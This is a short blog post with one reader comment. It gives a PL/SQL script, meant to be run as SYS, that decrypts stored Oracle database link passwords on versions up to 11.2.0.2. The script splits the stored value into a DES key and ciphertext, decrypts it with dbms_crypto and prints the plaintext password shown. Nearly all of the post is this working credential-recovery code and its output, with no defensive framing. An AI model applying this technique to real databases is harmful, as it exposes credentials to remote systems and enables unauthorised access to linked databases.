Friday, November 29, 2013

Decrypting Oracle database DB link password (Versions <= 11.2.0.2) 


-- Run as SYS user
set serveroutput on

declare
 db_link_password varchar2(100);
begin

 db_link_password := '0560A31A6EFEC902B9286FFC981F4C9A92F8470D406ADEA670';

 dbms_output.put_line ('Plain password: ' ||
                          -- Convert RAW to varchar2
                          utl_raw.cast_to_varchar2 (

                              dbms_crypto.decrypt (

                               -- from 19th char to end, it is encrypted source
                               substr (db_link_password, 19) ,

                               -- Type of encryption
                               dbms_crypto.DES_CBC_PKCS5 ,

                               -- From 3rd to 16th char, it is key
                               substr (db_link_password, 3, 16)

                              )
                          )
                      );

end;
/

Plain password: Forget12
Posted by at

1 comment:

  1. AnonymousJanuary 12, 2016 at 5:26 AM

    How can I get if db link password more than 200 characters? I want to modify existing database link password from the one which already works.

    ReplyDelete

Subscribe to: Post Comments (Atom)